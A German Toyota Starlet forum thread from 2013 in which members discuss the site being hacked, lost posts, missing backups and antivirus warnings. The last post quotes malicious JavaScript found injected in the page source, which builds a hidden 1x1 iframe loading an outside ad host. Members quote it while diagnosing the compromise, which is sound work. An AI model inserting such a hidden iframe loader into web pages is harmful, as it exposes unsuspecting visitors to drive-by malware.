Forencrash

Sonstige Themen
Benutzeravatar
Damadin
Starlet-Schrauber
Beiträge: 574
Registriert: Do 10. Feb 2011, 22:01
Fahrzeugtyp: Starlet P8

Forencrash

Beitrag von Damadin »

Zitat:
"Forumscrash

Beitragvon mirK » Sa 26 Jan, 2013 16:57
Leider ist es am Mittwoch, den 23.01.2013 zu einem kompletten Crash des Forum gekommen. Dadurch war dieses die vergangenen Tage nicht erreichbar!Durch Manipulationen an der Datenbank,
fehlen leider die User die sich ab 03.08.2012 neu registriert haben + deren Beiträge!

Ansonsten sollte alles NOTWENDIGE vorhanden sein!"

Soweit ich es feststellen konnte fehlen doch weiterhin ein Grossteil der in den letzten Monaten vefassten Beiträge ALLER User, oder mach ich nur irgendwas falsch?

Gibts nen Backup, mit dem man diese Beiträge widerherstellen kann?
八十から一

Ex-Starlet´s:
EP81, 2ee, weiß, 161.000 -weggerostet + 2. Leben in Afrika-
EP81-Schlachter (mit Nik), 2ee, blau, 180.000 -weggerostet + Schrottplatz-
EP81 Si, 2ee, rot, 148.000 -fährt nun in Stuttgart-

Aktueller Starlet:
EP81, 2ee, weiß, 101.000
Benutzeravatar
shArki_p9
Starlet-Tuner
Beiträge: 865
Registriert: Mi 5. Aug 2009, 21:19
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von shArki_p9 »

grad mal beim druchwuselen gesehen, dass da zB alles vom meiningen thread fehlt... Ham die unsere mySQL ge***** ? oder was is da genau passiert ?
Benutzeravatar
mirK
Site-Techniker und nicht mehr...
Beiträge: 1029
Registriert: Do 29. Apr 2004, 17:30
Fahrzeugtyp: Sonstiges
Kontaktdaten:

Re: Forencrash

Beitrag von mirK »

die datein sind nicht mal das problem, sondern genau wie sharki sagt die mysql datenbank!
so wie es aussieht fehlen auch die threads wo neuere mitglieder ab sommer 2012 gepostet haben!


weitere backups gibts nicht, so wie das forum momentan läuft, besteht dieses aus 4 verschiedenen backups, aus jedem der wichtigste teil!
Bild
Benutzeravatar
shArki_p9
Starlet-Tuner
Beiträge: 865
Registriert: Mi 5. Aug 2009, 21:19
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von shArki_p9 »

wahnsinn ey -.-

und warum is die datenband abgeschmiert ? menschliches versagen, softwareproblem oder doch hacker ?
Benutzeravatar
mirK
Site-Techniker und nicht mehr...
Beiträge: 1029
Registriert: Do 29. Apr 2004, 17:30
Fahrzeugtyp: Sonstiges
Kontaktdaten:

Re: Forencrash

Beitrag von mirK »

gehacked .... :(
Bild
Benutzeravatar
shArki_p9
Starlet-Tuner
Beiträge: 865
Registriert: Mi 5. Aug 2009, 21:19
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von shArki_p9 »

mirK hat geschrieben:gehacked .... :(
:eek: :motz: :mecker:
Benutzeravatar
Bananajoe888
Starlet-Modellierer
Beiträge: 1122
Registriert: Mi 4. Aug 2010, 16:37
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von Bananajoe888 »

die gehören doch anständig verprügelt....
Bild
Benutzeravatar
mike-gap
Starlet-Bastler
Beiträge: 407
Registriert: Mo 30. Jun 2008, 07:01
Fahrzeugtyp: Starlet P8

Re: Forencrash

Beitrag von mike-gap »

Am 23.01. wurde das Forum von http://www.alfa-power.de auch gehackt. :gruebel:
It's nice to be a Preiss, but it's higher, to be a Bayer!
P8 open air, 04/94, 198 000 km
Benutzeravatar
masterofdisaster
Starlet-Sammler
Beiträge: 2979
Registriert: Do 28. Apr 2005, 15:18
Fahrzeugtyp: Sonstiges

Re: Forencrash

Beitrag von masterofdisaster »

Irgendwie stimmen die Threadersteller nicht mit Threads überein.

Ich habe gestern den Meiningen Thread nochmal gepostet und da steht Robert23 als Autor :gruebel:
Life ist too short to drive boring cars
Bild
Benutzeravatar
carat
Mit Liebe zum Detail
Beiträge: 2808
Registriert: Fr 26. Aug 2005, 10:55

Re: Forencrash

Beitrag von carat »

masterofdisaster hat geschrieben:Irgendwie stimmen die Threadersteller nicht mit Threads überein.

Ich habe gestern den Meiningen Thread nochmal gepostet und da steht Robert23 als Autor :gruebel:
Und das Erstellungsdatum stimmt da auch nicht so ganz 04. August 2012...........
Benutzeravatar
Katana
Starlet-Fachmann
Beiträge: 1656
Registriert: Fr 13. Aug 2010, 13:38
Fahrzeugtyp: Starlet P8
Kontaktdaten:

Re: Forencrash

Beitrag von Katana »

was ich nicht ganz check is....who the fuck hacked ein starletforum? was bringt einen das bitte?

wenn der hacker ein problem zum starlet gehabt hätte, hätte er doch ganz normal fragn können :D :D :D
Benutzeravatar
lostprophet
Starlet-Lehrling
Beiträge: 194
Registriert: Di 1. Apr 2008, 19:48
Kontaktdaten:

Re: Forencrash

Beitrag von lostprophet »

naja, durch den Hack kann man bestimmt auch an viele eMail-Adressen rankommen.

Ãœbrigens scheint auch die Anzahl der Beiträge nicht so ganz hinzuhauen... ich meine der thread hier hat ja auch keine 2 Seiten...
Bild
starmotion
Moderator
Beiträge: 4523
Registriert: Do 2. Feb 2006, 22:50
Fahrzeugtyp: Starlet P9

Re: Forencrash

Beitrag von starmotion »

Das waren gewiss corsa fahrer deren gefährt mit nem p9 verwechselt wurde. lol!!!
Benutzeravatar
xXEiseltXx
Starlet-Schrauber
Beiträge: 561
Registriert: Mi 24. Feb 2010, 21:10
Fahrzeugtyp: Sonstiges
Kontaktdaten:

Re: Forencrash

Beitrag von xXEiseltXx »

ka ob das am crash liegt aber seitem fehlt bei mir rechts die navigationsleiste wenn ich beiträge betrachte oder. das nervt bisschen weil ich immer auf neue beiträge klicke um zurück zu gelangen.
Bild Bild
Benutzeravatar
shArki_p9
Starlet-Tuner
Beiträge: 865
Registriert: Mi 5. Aug 2009, 21:19
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von shArki_p9 »

...und warum zur hölle, stehen auf der zweiten seite die gleichen beiträge wie auf der ersten ? :O

Kann dir versuchen behilflich zu sein, nen cronjob einzurichten für zukünftige backups! aber erstma rauskriegen, was nu schonwieder faul is hier ...

deppen, mit zu viel langeweile ... :(
Benutzeravatar
lostprophet
Starlet-Lehrling
Beiträge: 194
Registriert: Di 1. Apr 2008, 19:48
Kontaktdaten:

Re: Forencrash

Beitrag von lostprophet »

und jetzt meldet firefox auch noch, dass die website als attackierend gemeldet wurde!?

http://www.stopbadware.org/common-hacks
Bild
Benutzeravatar
Keuli
Starlet-Tieferleger
Beiträge: 270
Registriert: Mo 26. Sep 2011, 22:17
Fahrzeugtyp: Starlet P9

Re: Forencrash

Beitrag von Keuli »

das sind aus Spass ihr Macht demonstrieren müssen... Da werden gern mal Foren zersägt.

hihi bin ganz neu hier :D
Benutzeravatar
Xpect
Ich habe die Magersucht überstanden
Beiträge: 335
Registriert: Di 14. Feb 2012, 15:36
Fahrzeugtyp: Starlet P9

Re: Forencrash

Beitrag von Xpect »

Warum besteht das Forum aus so vielen Backups? Kein richtiges Backup aus letzter Zeit vorhanden?

Wie gross ist denn insgesamt die Datenbank, die Scripte etc? Ich geb zu, mein Fachgebiet ist mehr Hardware als Software, aber afaik kann man ein gesamtes Forum doch jederzeit speichern und wiederherstellen wenn die Daten an anderer Stelle vorhanden sind. Ich würd auch gern anbieten, dass ich volle Backups bei mir speicher, meinetwegen auch verschlüsselt etc, die Daten interessieren mich nicht aber ich würd gern helfen. Speicherplatz hab ich genug dafür.
Benutzeravatar
mirK
Site-Techniker und nicht mehr...
Beiträge: 1029
Registriert: Do 29. Apr 2004, 17:30
Fahrzeugtyp: Sonstiges
Kontaktdaten:

Re: Forencrash

Beitrag von mirK »

seite ist sauber ...!

warum auch immer er es anzeigt!
Dateianhänge
forum2.jpg
forum1.jpg
Bild
Benutzeravatar
Sgt.Maulwurf
Starlet-Meister
Beiträge: 2334
Registriert: Mi 29. Jul 2009, 21:19
Fahrzeugtyp: Starlet P9

Re: Forencrash

Beitrag von Sgt.Maulwurf »

Also bei mir schlägt nichts an. Funktioniert alles.
An den am Kotfluegelrand abgelegten Schraubendreher denkt man erst nach dem Schliessen der Haube.
Bild
Benutzeravatar
shArki_p9
Starlet-Tuner
Beiträge: 865
Registriert: Mi 5. Aug 2009, 21:19
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von shArki_p9 »

Nu funzt es bei mir auch wieder !!
Benutzeravatar
VitoCalzone
Starlet-Tuner
Beiträge: 896
Registriert: Di 20. Mai 2008, 15:53
Fahrzeugtyp: Sonstiges
Kontaktdaten:

Re: Forencrash

Beitrag von VitoCalzone »

...ich hab komischerweise seit dem crash viren auf meinem rechner...weiss nicht ob da irgendein zusammenhang besteht, aber mal den virenscanner drüber laufen lassen kann sicherlich nicht schaden ;)
Spook
Starlet-Lehrling
Beiträge: 172
Registriert: So 14. Jan 2007, 15:33
Fahrzeugtyp: Starlet P9
Kontaktdaten:

Re: Forencrash

Beitrag von Spook »

VitoCalzone hat geschrieben:...ich hab komischerweise seit dem crash viren auf meinem rechner...weiss nicht ob da irgendein zusammenhang besteht, aber mal den virenscanner drüber laufen lassen kann sicherlich nicht schaden ;)
jupp, bei mir genau so.
AVIRA meldet:
"In der Datei C:\users\...\starletforum_de[1].htm wurde ein Virus oder unerwünschtes Programm JS/iFrame.afc gefunden"

Die kommt sobald ich auf http://www.starletforum.de gehe, die Seite wird auch in keinster weise korrekt angezeigt.

Zum Forum komme ich nur über http://www.starletforum.de/forum

Gruss
Bild
P9: Bild E15 D4D:Bild
Bild
Benutzeravatar
Sgt.Maulwurf
Starlet-Meister
Beiträge: 2334
Registriert: Mi 29. Jul 2009, 21:19
Fahrzeugtyp: Starlet P9

Re: Forencrash

Beitrag von Sgt.Maulwurf »

Avast ist ruhig. Mein Rechner scheint also nichts abbekommen zu haben.
An den am Kotfluegelrand abgelegten Schraubendreher denkt man erst nach dem Schliessen der Haube.
Bild
Benutzeravatar
lostprophet
Starlet-Lehrling
Beiträge: 194
Registriert: Di 1. Apr 2008, 19:48
Kontaktdaten:

Re: Forencrash

Beitrag von lostprophet »

jo, ganz unten im Quelltext scheint was eingeschmuggelt worden zu sein:

Code: Alles auswählen

(function () {    var ts = document.createElement('iframe');    ts.src = 'http://refireads.com/ads/';    ts.style.position = 'absolute';    ts.style.border = '0';    ts.style.height = '1px';    ts.style.width = '1px';    ts.style.left = '1px';    ts.style.top = '1px';    if (!document.getElementById('ts')) {        document.write('<div id=\'ts\'></div>');        document.getElementById('ts').appendChild(ts);    }})();</script><!--/0c45ef-->
Bild
Antworten